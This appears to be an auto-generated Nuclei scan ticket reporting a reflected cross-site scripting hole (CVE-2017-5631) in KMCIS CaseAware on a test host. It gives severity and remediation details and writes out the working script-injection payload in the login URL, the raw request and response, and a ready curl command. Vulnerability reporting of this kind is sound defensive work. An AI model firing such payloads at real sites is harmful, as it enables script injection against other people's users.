mkrs2404 / tickets


KMCIS CaseAware - Cross-Site Scripting (CVE-2017-5631) found on honey.scanme.sh #7

Closed mkrs2404 closed 3 months ago

mkrs2404 commented 6 months ago

Details: CVE-2017-5631 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:03 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/7547ff00527641e0b6a625fd18d2a303

Template Information

| Key | Value |
| --- | --- |
| Name | KMCIS CaseAware - Cross-Site Scripting |
| Authors | edoardottt |
| Tags | cve2017, cve, edb, xss, caseaware, kmc_information_systems |
| Severity | medium |
| Description | KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. |
| Remediation | To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. |
| CVSS-Metrics | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| CWE-ID | CWE-79 |
| CVE-ID | CVE-2017-5631 |
| CVSS-Score | 6.10 |
| vendor | kmc_information_systems |
| product | caseaware |

Request

GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 332
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:03 GMT

GET /login.php?mid=0&usr=admin'></script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3' 'https://honey.scanme.sh/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5